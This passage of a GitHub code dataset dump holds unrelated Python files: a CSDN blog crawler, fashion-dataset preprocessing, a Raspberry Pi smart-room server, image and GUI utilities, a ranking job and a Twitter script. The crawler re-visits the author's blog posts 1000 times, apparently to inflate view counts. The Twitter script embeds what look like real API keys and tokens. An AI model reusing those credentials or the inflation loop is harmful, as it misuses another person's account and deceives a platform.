redirect(url_for('profile_bp.profile'))","repo_name":"MaxDaGiau/IS-PoliCook","sub_path":"PoliCook/blueprints/profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":3170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"7517281054","text":"import requests\r\nfrom lxml import html\r\nimport re\r\nimport time\r\nimport random\r\n\r\n\r\nclass csdnCrawler:\r\n def __init__(self):\r\n self.headers = {\r\n 'Accept-Encoding': 'gzip, deflate, br',\r\n 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',\r\n 'Upgrade-Insecure-Requests': '1',\r\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',\r\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\r\n 'Cache-Control': 'max-age=0',\r\n #'Connection': 'keep-alive',\r\n 'Connection': 'close'\r\n }\r\n \r\n def click(self):\r\n url = 'https://blog.csdn.net/'+'你的csdn用户名'\r\n resp = requests.get(url,headers=self.headers)\r\n #print(str(resp.content,'utf8'))\r\n resultList = self.parse(resp)\r\n for url in resultList:\r\n self.visit(url)\r\n\r\n def parse(self,resp): #博客列表\r\n selector = html.fromstring(resp.content)\r\n return selector.xpath('//p[@class=\"content\"]/a/@href')\r\n \r\n def visit(self,url):\r\n try:\r\n print('访问: ',url)\r\n resp = requests.get(url,headers=self.headers)\r\n selector = html.fromstring(resp.content)\r\n \r\n except Exception as e:\r\n print(e)\r\n \r\n\r\n\r\nif(__name__=='__main__'):\r\n csdn = csdnCrawler()\r\n times = 0\r\n while(times < 1000):\r\n csdn.click()\r\n times = times+1\r\n print(times)\r\n time.sleep(60+random.random()*5)\r\n","repo_name":"githubxiaowei/crawler","sub_path":"csdnCrawler.py","file_name":"csdnCrawler.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"20092985235","text":"import pickle, time, glob, argparse\nimport torch\nimport numpy as np\nfrom PIL import Image\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--datadir', type=str, default='Data/DeepFashion/Category and Attribute Prediction Benchmark')\nparser.add_argument('--humanlabels_to_onehot', type=str, default='DeepFashion/humanlabels_to_onehot.pkl')\nparser.add_argument('--labels_val', type=str, default='DeepFashion/labels_val.pkl')\nparser.add_argument('--labels_train', type=str, default='DeepFashion/labels_train.pkl')\nparser.add_argument('--labels_test', type=str, default='DeepFashion/labels_test.pkl')\nparser.add_argument('--biased_classes', type=str, default='DeepFashion/biased_classes.pkl')\nparser.add_argument('--biased_classes_mapped', type=str, default='DeepFashion/biased_classes_mapped.pkl')\narg = vars(parser.parse_args())\nprint('\\n', arg, '\\n')\n\n\n# Load labels\nattributes_txt = open('{}/Anno_coarse/list_attr_cloth.txt'.format(arg['datadir']))\nattributes_txt = attributes_txt.read().split('\\n')\nattributes_txt = attributes_txt[2:-1] # first two lines contain headers and number of attrs, last line is empty\n\n# Create a dictionary that maps human-readable labels to [0-1000], but don't save because we only need the top 250\nhumanlabels = []\nhumanlabels_to_onehot = {}\nfor i in range(1000):\n humanlabel = ''.join(i for i in attributes_txt[i] if not i.isdigit()).rstrip()\n humanlabels.append(humanlabel)\n humanlabels_to_onehot[humanlabel] = i\n\n# Create a dictionary mapping filenames to labels\nlist_attr_img = open('{}/Anno_coarse/list_attr_img.txt'.format(arg['datadir']))\nlist_attr_img = list_attr_img.read().split('\\n')\nlist_attr_img = list_attr_img[2:-1] # first two lines contain headers and number of images, last line is empty\n\nprint('Mapping filenames to labels')\nstart_time = time.time()\nimg_to_label = {}\nfor count,anno in enumerate(list_attr_img):\n anno = anno.split()\n img = anno[0]\n img = '{}/Img/img/{}'.format(arg['datadir'], img)\n label = [int(i) for i in anno[1:]]\n label = [(i + 1) // 2 for i in label]\n label = torch.LongTensor(label).float()\n img_to_label[img] = label\n\n if count%1000 == 0:\n print(count, time.time()-start_time)\nprint('Done')\n\n# Create a list of train, val, test, image file names\neval_split_txt = open('{}/Eval/list_eval_partition.txt'.format(arg['datadir']))\neval_split_txt = eval_split_txt.read().split('\\n')\neval_split_txt = eval_split_txt[2:-1]\nval = []\ntrain = []\ntest = []\nfor line in eval_split_txt:\n filename, split = line.split()\n filename = '{}/Img/img/{}'.format(arg['datadir'], filename)\n if split == 'train':\n train.append(filename)\n elif split == 'val':\n val.append(filename)\n elif split == 'test':\n test.append(filename)\n else:\n print('Unknown split: {}'.format(filename))\nprint('train {}, val {}, test {}\\n'.format(len(train), len(val), len(test)))\n\n# Get top 250 categories in train set\nattr_count = torch.zeros(1000)\nfor file in train:\n attr_count += img_to_label[file]\nsorted_attr = torch.argsort(attr_count)\n\ntop_250 = [] # store onehot indices of top 250 labels for easy access\nfor i in range(250):\n onehot = sorted_attr[-(i+1)]\n top_250.append(int(onehot))\ntop_250.sort() # make sure indices are in increasing order\n\nhumanlabels_to_onehot = {}\nfor i in range(250):\n onehot = top_250[i]\n humanlabel = humanlabels[onehot]\n humanlabels_to_onehot[humanlabel] = i\n\n# Save top 250 most common labels in train set\nwith open(arg['humanlabels_to_onehot'], 'wb+') 
as handle:\n pickle.dump(humanlabels_to_onehot, handle)\nprint('Saved top 250 train labels in humanlabels_to_onehot.pkl')\n\n# Process DeepFashion validation set labels\nif True:\n count = 0\n labels = {}\n for file in val:\n label_onehot_1000 = img_to_label[file]\n label_onehot_250 = label_onehot_1000[top_250]\n labels[file] = label_onehot_250 # Save the one-hot encoded label\n count += 1\n\n print('Finished processing {} val labels'.format(len(labels)))\n with open(arg['labels_val'], 'wb+') as handle:\n pickle.dump(labels, handle)\n\n# Process DeepFashion train set labels\nif True:\n count = 0\n labels = {}\n for file in train:\n label_onehot_1000 = img_to_label[file]\n label_onehot_250 = label_onehot_1000[top_250]\n labels[file] = label_onehot_250 # Save the one-hot encoded label\n count += 1\n\n print('Finished processing {} train labels'.format(len(labels)))\n with open(arg['labels_train'], 'wb+') as handle:\n pickle.dump(labels, handle)\n\n# Process DeepFashion test set labels\nif True:\n count = 0\n labels = {}\n for file in test:\n label_onehot_1000 = img_to_label[file]\n label_onehot_250 = label_onehot_1000[top_250]\n labels[file] = label_onehot_250 # Save the one-hot encoded label\n count += 1\n\n print('Finished processing {} test labels'.format(len(labels)))\n with open(arg['labels_test'], 'wb+') as handle:\n pickle.dump(labels, handle)\n\n# 20 most biased classes identified in the original paper\nbiased_classes = {}\nbiased_classes['bell'] = 'lace'\nbiased_classes['cut'] = 'bodycon'\nbiased_classes['animal'] = 'print'\nbiased_classes['flare'] = 'fit'\nbiased_classes['embroidery'] = 'crochet'\nbiased_classes['suede'] = 'fringe'\nbiased_classes['jacquard'] = 'flare'\nbiased_classes['trapeze'] = 'striped'\nbiased_classes['neckline'] = 'sweetheart'\nbiased_classes['retro'] = 'chiffon'\nbiased_classes['sweet'] = 'crochet'\nbiased_classes['batwing'] = 'loose'\nbiased_classes['tassel'] = 'chiffon'\nbiased_classes['boyfriend'] = 'distressed'\nbiased_classes['light'] = 'skinny'\nbiased_classes['ankle'] = 'skinny'\nbiased_classes['french'] = 'terry'\nbiased_classes['dark'] = 'wash'\nbiased_classes['medium'] = 'wash'\nbiased_classes['studded'] = 'denim'\nwith open(arg['biased_classes'], 'wb+') as handle:\n pickle.dump(biased_classes, handle)\n\nbiased_classes_mapped = dict((humanlabels_to_onehot[key], humanlabels_to_onehot[value]) for (key, value) in biased_classes.items())\nwith open(arg['biased_classes_mapped'], 'wb+') as handle:\n pickle.dump(biased_classes_mapped, handle)\n","repo_name":"princetonvisualai/ContextualBias","sub_path":"DeepFashion/data_process.py","file_name":"data_process.py","file_ext":"py","file_size_in_byte":6136,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"3"}
+{"seq_id":"25874685712","text":"from flask import Flask, jsonify, request\r\nfrom flask_socketio import SocketIO\r\nfrom flask_cors import CORS\r\nfrom DP1Database import Database\r\nimport RPi.GPIO as GPIO\r\nimport time\r\nimport ldr\r\nimport vochtig\r\nimport beweging\r\nimport pigpio\r\nfrom PCF8574A import LCDScreen\r\nlcd = LCDScreen(False, 21, 20, 22, 5, 6, 27, 17, 25, 12, 16) # init van lcd\r\nlcd.LCD_init() # init van LCD (2\r\n\r\napp = Flask(__name__)\r\nCORS(app)\r\nsocketio = SocketIO(app)\r\nconn = Database(app=app, user='ruben', password='rubenroose', db='project1')\r\nvochtigheid = vochtig.Vochtig(conn)\r\n\r\n\r\n\r\n\r\n@socketio.on('getTemp')\r\ndef temp():\r\n temp = conn.get_data(\"SELECT Value FROM project1.Historiek WHERE project1.Historiek.Sensor_SensorID = 2 ORDER BY project1.Historiek.HistoriekID DESC LIMIT 1;\")\r\n socketio.emit('giveTemp', str(temp[0]['Value']))\r\n\r\n@socketio.on('getVocht')\r\ndef temp():\r\n vocht = conn.get_data(\"SELECT Value FROM project1.Historiek WHERE project1.Historiek.Sensor_SensorID = 1 ORDER BY project1.Historiek.HistoriekID DESC LIMIT 1;\")\r\n socketio.emit('giveVocht', str(vocht[0]['Value']))\r\n\r\n@socketio.on('getGraad')\r\ndef graad():\r\n graad = conn.get_data(\"SELECT Value FROM project1.Historiek WHERE project1.Historiek.Sensor_SensorID = 2 ORDER BY project1.Historiek.HistoriekID DESC LIMIT 1;\")\r\n socketio.emit('giveGraad', str(graad[0]['Value']))\r\n\r\n@socketio.on('getProcent')\r\ndef temp():\r\n procent = conn.get_data(\"SELECT Value FROM project1.Historiek WHERE project1.Historiek.Sensor_SensorID = 2 ORDER BY project1.Historiek.HistoriekID DESC LIMIT 1;\")\r\n socketio.emit('giveProcent', str(procent[0]['Value']))\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nlopen = beweging.Beweging(conn)\r\nlicht = ldr.Licht(conn)\r\n\r\n\r\nlcd.send_line('Smartroom')\r\nlcd.second_row()\r\nlcd.statusip1()\r\n\r\n\r\nservopin = 26\r\nservoPIN = 18\r\n\r\npiGPIO = pigpio.pi()\r\npiGPIO.set_PWM_frequency(servoPIN, 50)\r\npiGPIO.set_PWM_dutycycle(servoPIN, (14/100)*255)\r\n\r\n\r\n@socketio.on('knop')\r\ndef openGordijn():\r\n piGPIO.set_PWM_dutycycle(servoPIN, (7.5 / 100) * 255)\r\n time.sleep(30)\r\n\r\npiGPIO.set_PWM_frequency(servopin, 50)\r\npiGPIO.set_PWM_dutycycle(servopin, (14/100)*255)\r\n\r\n@socketio.on('button')\r\ndef openDeur():\r\n piGPIO.set_PWM_dutycycle(servopin, (7.5 / 100) * 255)\r\n time.sleep(30)\r\n#\r\n#\r\n# @socketio.on('button2')\r\n# def geklikt():\r\n# h.ChangeDutyCycle(7.5)\r\n# time.sleep(5)\r\n# h.ChangeDutyCycle(2.5)\r\n# time.sleep(1)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n socketio.run(app, debug=False, host=\"0.0.0.0\", port=5000)","repo_name":"Rubenroose/smartroom","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"14842578673","text":"from PIL import Image\n\nclass ImageService:\n template_path = \"Figma_Version.png\"\n template = Image.open(template_path).convert('RGBA')\n template_width, template_height = template.size\n\n @classmethod\n def handle_image_upload(cls, file_path):\n # Open the uploaded image\n try:\n uploaded_image = Image.open(file_path).convert('RGBA')\n except Exception as e:\n print(f\"Error: Unable to open the uploaded image: {e}\")\n return\n\n uploaded_width, uploaded_height = uploaded_image.size\n\n # Define the fixed dimensions back to their original values\n fixed_width = 5000\n fixed_height = 3350\n\n # Scale the uploaded image to fit the fixed dimensions\n scaled_image = uploaded_image.resize((fixed_width, fixed_height), Image.LANCZOS)\n\n # Manually adjust the position of the scaled image\n x = 550 # Adjust the value based on your desired position from the left edge\n y = 80 # Adjust the value based on your desired position from the top edge\n\n # Create a new transparent image with the template's size\n combined_image = Image.new('RGBA', (cls.template_width, cls.template_height), (0, 0, 0, 0))\n\n # Paste the scaled image onto the transparent image with the mask\n combined_image.paste(scaled_image, (x, y))\n\n # Combine the scaled image with the template using the alpha channel\n cls.template = Image.alpha_composite(cls.template, combined_image)\n\n @classmethod\n def save_resulting_image(cls, output_path):\n # Save the resulting image with higher quality\n cls.template.save(output_path)\n\nif __name__ == \"__main__\":\n # Replace with the actual file paths for the uploaded image and output image\n uploaded_image_path = \"20230729330.JPG\"\n output_path = \"output.png\"\n\n # Perform image upload, scaling, and embedding on the template\n ImageService.handle_image_upload(uploaded_image_path)\n\n # Save the resulting image\n ImageService.save_resulting_image(output_path)\n\n print(\"Image processing complete. Result saved as 'output.png'.\")\n\n\n# import os\n# import boto3\n# from PIL import Image\n\n# s3 = boto3.client('s3')\n\n# class ImageService:\n# template_path = \"Figma_Version.png\"\n# template = Image.open(template_path).convert('RGBA')\n# template_width, template_height = template.size\n\n# @classmethod\n# def handle_image_upload(cls, file_path):\n# try:\n# uploaded_image = Image.open(file_path).convert('RGBA')\n# except Exception as e:\n# print(f\"Error: Unable to open the uploaded image: {e}\")\n# return\n\n# uploaded_width, uploaded_height = uploaded_image.size\n\n# fixed_width = 5000\n# fixed_height = 3350\n# scaled_image = uploaded_image.resize((fixed_width, fixed_height), Image.LANCZOS)\n\n# x = 550\n# y = 80\n\n# combined_image = Image.new('RGBA', (cls.template_width, cls.template_height), (0, 0, 0, 0))\n# combined_image.paste(scaled_image, (x, y))\n# cls.template = Image.alpha_composite(cls.template, combined_image)\n\n# @classmethod\n# def save_resulting_image(cls, output_path):\n# cls.template.save(output_path)\n\n# def lambda_handler(event, context):\n# uploaded_image_key = \"20230729330.JPG\"\n# output_key = \"output.png\"\n\n# temp_local_path = '/tmp/' + uploaded_image_key\n# output_local_path = '/tmp/' + output_key\n\n# s3.download_file('your-s3-bucket-name', uploaded_image_key, temp_local_path)\n\n# ImageService.handle_image_upload(temp_local_path)\n# ImageService.save_resulting_image(output_local_path)\n\n# s3.upload_file(output_local_path, 'your-s3-bucket-name', output_key)\n\n# return \"Image processing complete. 
Result saved as 'output.png'.\"\n","repo_name":"egg-lou/TemplatePhoto","sub_path":"template_script.py","file_name":"template_script.py","file_ext":"py","file_size_in_byte":3822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"20305151004","text":"from __future__ import division\n\ntry:\n import Tkinter as tkinter\nexcept ImportError:\n import tkinter\n\nfrom .control_objects import Label\n\n\nclass KeyMap(object):\n def __init__(self):\n # JavaScript keycode translations\n self._tr = {'up': 38, 'down': 40, 'left': 37, 'right': 39,\n 'space': 32, 'return': 13, 'tab': 9, 'backspace': 8,\n 'comma': 188, 'minus': 189, 'period': 190, 'slash': 191}\n nums = dict(zip([chr(x) for x in range(ord('0'), ord('9') + 1)],\n range(48, 58)))\n self._tr.update(nums)\n alphas = dict(zip([chr(x) for x in range(ord('a'), ord('z') + 1)],\n range(65, 91)))\n self._tr.update(alphas)\n fxs = dict(zip(['f%d' % x for x in range(1, 13)], range(112, 124)))\n self._tr.update(fxs)\n\n def __getitem__(self, name):\n # Attempt to map key to keycode, otherwise just return the name so it\n # can be matched by KEY_MAP[name].\n return self._tr.get(name.lower(), name.lower())\n\n\nKEY_MAP = KeyMap()\n\n\nclass InputAdapter(object):\n def _status_frame_init(self, status_frame):\n key_frame = tkinter.LabelFrame(status_frame, text='Key')\n self._key_label = Label(key_frame, '')\n\n mouse_frame = tkinter.LabelFrame(status_frame, text='Mouse')\n self._mouse_label = Label(mouse_frame, '')\n\n key_frame.pack(fill=tkinter.BOTH)\n mouse_frame.pack(fill=tkinter.BOTH)\n\n def __init__(self, status_frame, key_master, mouse_master):\n self._key_label = None\n self._mouse_label = None\n self._status_frame_init(status_frame)\n\n self._key_after_id = None\n self._keydown_handler = None\n self._keyup_handler = None\n self._key_master = key_master\n key_master.bind('', self._keydown)\n key_master.bind('', self._keyup)\n\n self._mouse_click_handler = None\n self._mouse_drag_handler = None\n mouse_master.bind('', self._mouse_click)\n mouse_master.bind('', self._mouse_drag)\n\n def _keydown(self, key):\n if self._keydown_handler is not None:\n if self._key_after_id is not None:\n self._key_master.after_cancel(self._key_after_id)\n self._key_after_id = None\n else:\n self._key_label.set_text('Down %s' % key.keysym)\n self._keydown_handler(KEY_MAP[key.keysym])\n\n def _keyup_no_bounce(self, key):\n if self._keyup_handler is not None:\n self._key_label.set_text('Up %s' % key.keysym)\n self._keyup_handler(KEY_MAP[key.keysym])\n self._key_after_id = None\n\n def _keyup(self, key):\n after_id = self._key_master.after_idle(self._keyup_no_bounce, key)\n self._key_after_id = after_id\n\n def _mouse_click(self, event):\n if self._mouse_click_handler is not None:\n pos = (event.x, event.y)\n self._mouse_label.set_text('Click %d, %d' % (pos[0], pos[1]))\n self._mouse_click_handler(pos)\n\n def _mouse_drag(self, event):\n if self._mouse_drag_handler is not None:\n pos = (event.x, event.y)\n self._mouse_label.set_text('Move %d, %d' % (pos[0], pos[1]))\n self._mouse_drag_handler((event.x, event.y))\n\n def set_keydown_handler(self, key_handler):\n self._keydown_handler = key_handler\n\n def set_keyup_handler(self, key_handler):\n self._keyup_handler = key_handler\n\n def set_mouseclick_handler(self, mouse_handler):\n self._mouse_click_handler = mouse_handler\n\n def set_mousedrag_handler(self, mouse_handler):\n self._mouse_drag_handler = mouse_handler\n","repo_name":"dholm/simpleguitk","sub_path":"simpleguitk/input.py","file_name":"input.py","file_ext":"py","file_size_in_byte":3724,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"3"}
+{"seq_id":"7648708912","text":"\"\"\"Plot grafa krivulje drugog reda, te analiza o kojoj se krivulji radi isprintano na prikazu\"\"\"\r\nimport pandas as pd\r\nfrom matplotlib import pyplot as plt\r\nimport numpy as np\r\nfrom PIL import ImageTk,Image\r\nfrom tkinter import *\r\n\r\nroot = Tk()\r\nbackground = \"#DDE0A9\"\r\nentry_background = \"#F1F1F1\"\r\nroot.title(\"Graf krivulje drugog reda\")\r\nroot.geometry(\"1280x720+1+1\")\r\nroot.configure(background=background)\r\ndef quit():\r\n root.quit()\r\n root.destroy()\r\ndef plot_graph():\r\n A = A_entry.get()\r\n C = C_entry.get()\r\n D = D_entry.get()\r\n E = E_entry.get()\r\n F = F_entry.get()\r\n\r\n if A != '' and C !='' and D != '' and E != '' and F != '':\r\n A = int(A)\r\n C = int(C)\r\n D = int(D)\r\n F = int(F)\r\n E = int(E)\r\n if (A == 0 or C == 0):\r\n object_type = \"Parabola\"\r\n elif (A == C):\r\n object_type = \"Kruznica\"\r\n elif (A * C < 0):\r\n object_type = \"Hiperbola\"\r\n elif (A * C > 0):\r\n object_type = \"Elipsa\"\r\n\r\n x = np.linspace(-10, 10, 500)\r\n y = np.linspace(-10, 10, 500)\r\n X, Y = np.meshgrid(x, y)\r\n\r\n G = A*X*X + C*Y*Y + D*X + E*Y + F\r\n fig,ax = plt.subplots()\r\n ax.contour(X, Y, G, levels=[15], colors='red') # take level set corresponding to 0\r\n ax.spines['left'].set_position('zero')\r\n ax.spines['right'].set_color('none')\r\n ax.spines['bottom'].set_position('zero')\r\n ax.spines['top'].set_color('none')\r\n plt.title(str(object_type))\r\n plt.grid()\r\n plt.show()\r\n return\r\n\r\nfunc_label = Label(root, text='F(x,y)=Ax^2 + Cy^2 + Dx + Ey + F', font=('Helvetica', 15), bg=background)\r\nfunc_label.place(x=10, y=50, width=350, height=25)\r\nA_label = Label(root, text='A',bg=background).place(x=60, y=150, width=10, height=25)\r\nA_entry = Entry(root, bg=entry_background)\r\nA_entry.place(x=75, y=150, width=100, height=25)\r\nC_label = Label(root, text='C',bg=background).place(x=60, y=180, width=10, height=25)\r\nC_entry = Entry(root, bg=entry_background)\r\nC_entry.place(x=75, y=180, width=100, height=25)\r\nD_label = Label(root, text='D',bg=background).place(x=60, y=210, width=10, height=25)\r\nD_entry = Entry(root, bg=entry_background)\r\nD_entry.place(x=75, y=210, width=100, height=25)\r\nE_label = Label(root, text='E',bg=background).place(x=60, y=240, width=10, height=25)\r\nE_entry = Entry(root, bg=entry_background)\r\nE_entry.place(x=75, y=240, width=100, height=25)\r\nF_label = Label(root, text='F',bg=background).place(x=60, y=270, width=10, height=25)\r\nF_entry = Entry(root, bg=entry_background)\r\nF_entry.place(x=75, y=270, width=100, height=25)\r\ngraph_button = Button(root, command=plot_graph, text='graph', font=('Helvetica', 12), bg='#58E56B').place(x=60, y=330, width=120, height=45)\r\ngraph_quit = Button(root, command=quit, text='quit', font=('Helvetica', 12), bg='#EE452A').place(x=60, y=400, width=120, height=45)\r\nroot.mainloop()\r\n","repo_name":"MarkoBosnjak1/Small-codes","sub_path":"mat.py","file_name":"mat.py","file_ext":"py","file_size_in_byte":2940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"70048145682","text":"from django.shortcuts import render\nfrom django.contrib.auth.decorators import login_required\nfrom shop.models import Order\n\n\n\n@login_required\ndef profile(request):\n order_list = request.user.order_set.all()\n sum_amount = 0\n confirmed_order_list = []\n for order in order_list:\n order.update()\n if order.status == 'paid':\n confirmed_order_list.append(order)\n sum_amount += order.amount\n # order_list = Order.objects.filter(user=request.user)\n return render(request, 'accounts/profile.html', {\n 'order_list': confirmed_order_list,\n 'sum_amount': sum_amount,\n })\n","repo_name":"countmonte7/sssg","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"73805813202","text":"import os\nimport argparse\nimport json\nimport time\nimport cv2\nfrom wand.image import Image\nfrom google.cloud import storage\nfrom google.cloud import pubsub_v1\n\ndef poll_notifications(project, subscription_name):\n \"\"\"Polls a Cloud Pub/Sub subscription for new GCS events for display.\"\"\"\n # [BEGIN poll_notifications]\n subscriber = pubsub_v1.SubscriberClient()\n subscription_path = subscriber.subscription_path(\n project, subscription_name\n )\n\n def callback(message):\n #show_image(message.attributes['objectId'])\n #print(\"Received message:\\n{}\".format(summarize(message)))\n data = message.data.decode(\"utf-8\")\n attributes = message.attributes\n\n event_type = attributes[\"eventType\"]\n bucket_id = attributes[\"bucketId\"]\n object_id = attributes[\"objectId\"]\n print(object_id)\n message.ack()\n var = \"Message not important\"\n if \"data\" in object_id:\n storage_client = storage.Client.from_service_account_json('service_account.json')\n # get bucket with name\n bucket = storage_client.get_bucket('processed_artworks')\n # get bucket data as blob\n blob = bucket.get_blob(object_id)\n # convert to stringfil\n json_data = blob.download_as_string()\n # open file in writing\n text_file = open(object_id, \"wb\")\n # write on file and close\n n = text_file.write(json_data)\n text_file.close()\n # image to process\n image_to_get = object_id[:-4].split(\"_\")[-1]\n with Image(filename=image_to_get) as left:\n print('width_1 =', left.width)\n print('height_1 =', left.height)\n # data image\n with Image(filename=object_id) as img2:\n print('width_2 =', img2.width)\n print('height_2 =', img2.height)\n if left.width != img2.width or left.height != img2.height:\n img2.resize(left.width, left.height)\n img2.save(filename=\"resized.png\") \n with Image(filename=\"resized.png\") as affinity:\n left.remap(affinity)\n else:\n left.remap(img2)\n left.save(filename=\"image_displayed.jpg\")\n # display the image\n print(\"Showing image:{}\".format(image_to_get))\n img2 = cv2.imread('./image_displayed.jpg')\n cv2.imshow(\"image\", img2)\n var = \"Image correctly showed\"\n print(\"Result of callback:{}\".format(var))\n \n\n subscriber.subscribe(subscription_path, callback=callback)\n # The subscriber is non-blocking, so we must keep the main thread from\n # exiting to allow it to process messages in the background.\n print(\"Listening for messages on {}\".format(subscription_path))\n img = cv2.imread('./{}'.format(\"cristo.jpg\"))\n cv2.namedWindow(\"image\", cv2.WINDOW_NORMAL)\n # for the full screen mode\n #cv2.setWindowProperty(\"image\", cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)\n while True:\n cv2.waitKey(0)\n \n #time.sleep(60)\n # [END poll_notifications]\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description=__doc__,\n formatter_class=argparse.RawDescriptionHelpFormatter,\n )\n parser.add_argument(\n \"project\", help=\"The ID of the project that owns the subscription\"\n )\n parser.add_argument(\n \"subscription\", help=\"The ID of the Pub/Sub subscription\"\n )\n args = parser.parse_args()\n poll_notifications(args.project, args.subscription)\n","repo_name":"fcolasante/dynARTwork","sub_path":"devices/actuators/notification_polling.py","file_name":"notification_polling.py","file_ext":"py","file_size_in_byte":3707,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"72523448720","text":"\"\"\"排名模块\"\"\"\nimport threading\nimport time\n\nimport pymongo\nimport schedule\n\n# mongodb host\nhost = \"localhost\"\n\nvj = pymongo.MongoClient(host=host, port=27017)['vj']\n\n\ndef match_info(start, num):\n \"\"\"\n 获得每个用户的total_sub, total_ac,total_wa,last_submit_time(保证兼容)\n :param start: 开始处理的id号\n :param num: 每次处理的个数\n :return: None\n \"\"\"\n users = vj['user'].find().skip(start).limit(num)\n cnt = 1\n for user in users:\n username = user['username']\n try:\n total_sub = vj['submission'].count({'username': username})\n\n total_ac_submit = vj['submission'].find({'username': username, 'result': 'Accepted'})\n total_ac_submit_set = set()\n for ac_submit in total_ac_submit:\n total_ac_submit_set.add(\"{} {}\".format(ac_submit['soj'], str(ac_submit['sid'])))\n total_ac = len(total_ac_submit_set)\n\n total_wa = vj['submission'].find({'username': username, 'result': 'Wrong Answer'}).count()\n\n try:\n last_submit_time = vj['submission'].find_one({'username': username}, sort=[('submittime', -1)])[\n 'submittime']\n except:\n total_sub = 0\n total_ac = 0\n total_wa = 0\n last_submit_time = None\n print(\"{} {} {} {} {} {}/{}\".format(username, total_sub, total_ac, total_wa, last_submit_time, cnt, num))\n\n cnt += 1\n vj['user'].find_and_modify(\n {'username': username},\n {'$set': {\n 'total_sub': total_sub,\n 'total_ac': total_ac,\n 'total_wa': total_wa,\n 'last_submit_time': last_submit_time\n }})\n\n except Exception as e:\n print('{}\\n{}'.format(username, e))\n\n\ndef match_info_multithreading():\n \"\"\"\n 多线程匹配信息\n :return:\n \"\"\"\n start = 0\n num = 100\n total = vj['user'].count()\n thread_pool = []\n while start < total:\n th = threading.Thread(target=match_info, args=(start, num))\n thread_pool.append(th)\n start += num\n\n for th in thread_pool:\n th.start()\n\n for th in thread_pool:\n th.join()\n\n\ndef rank():\n \"\"\"\n 排序,按照total_ac 降序,last_submit_time 降序(保证唯一)\n 注意:需要数据库建立索引 {\"total_ac\": -1}\n :return:None\n \"\"\"\n users = vj['user'].find().sort([('total_ac', -1), ('last_submit_time', -1)])\n cnt = 1\n for user in users:\n print(cnt, user.get('total_ac'), user.get('last_submit_time'))\n vj['user'].find_and_modify({'_id': user['_id']}, {'$set': {'rank': cnt}})\n cnt += 1\n\n\ndef task():\n match_info_multithreading()\n rank()\n\n\ndef main():\n schedule.every(1).day.at(\"01:00\").do(task)\n while True:\n schedule.run_pending()\n time.sleep(1)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"sduwh/vj","sub_path":"ranker/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2988,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"}
+{"seq_id":"28306806174","text":"import os\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport itertools\nimport collections\nfrom send_mongo import monsendmany\n\nimport tweepy as tw\nimport nltk\nfrom nltk.corpus import stopwords\nimport re\nimport networkx\n\nimport warnings\nimport pymongo\n\n\n# 3.md: regular expressions #\ndef remove_url(txt):\n return \" \".join(re.sub(\"([^0-9A-Za-z \\t])|(\\w+:\\/\\/\\S+)\", \"\", txt).split())\n\n\ndef main():\n warnings.filterwarnings(\"ignore\")\n\n sns.set(font_scale=1.5)\n sns.set_style(\"whitegrid\")\n\n # 1.md: authentication #\n\n # input your credentials here\n consumer_key = \"eqLHuY0uTBa0rCfnwUlfheGPc\"\n consumer_secret = \"2BqhyDJwdg2K6DWzcSEX6OKDOExiS5zv2p1inA0lcNDvQT7GzL\"\n access_token = \"3360443532-TOXKjRYl00GYYSNwAxP6lSwLTfjxBtRTSnTGXqA\"\n access_token_secret = \"yST3YcfLrkqJxjqg3T6JybZiaYGteWGvixIahVjMRb01D\"\n\n auth = tw.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n api = tw.API(auth, wait_on_rate_limit=True)\n\n # 2.md: searching #\n search_term = \"#COVID19\"\n\n tweets = tw.Cursor(api.search,\n q=search_term,\n lang=\"en\",\n since='2020-5-7').items(1000)\n\n all_tweets = [tweet.text for tweet in tweets]\n\n print(all_tweets[:5])\n all_tweets_no_urls = [remove_url(tweet) for tweet in all_tweets]\n print(all_tweets_no_urls[:5])\n\n # 4.md - Generating list of most common words into DataFrame #\n\n # Split the words from one tweet into unique elements\n print(all_tweets_no_urls[0].split())\n\n # Split the words from one tweet into unique elements\n print(all_tweets_no_urls[0].lower().split())\n\n # Create a list of lists containing lowercase words for each tweet\n words_in_tweet = [tweet.lower().split() for tweet in all_tweets_no_urls]\n print(words_in_tweet[:2])\n\n # List of all words across tweets\n stop_words = set(stopwords.words('english'))\n all_words_no_urls = list(itertools.chain(*words_in_tweet))\n filtered_sentence = []\n\n for w in all_words_no_urls:\n if w not in stop_words:\n 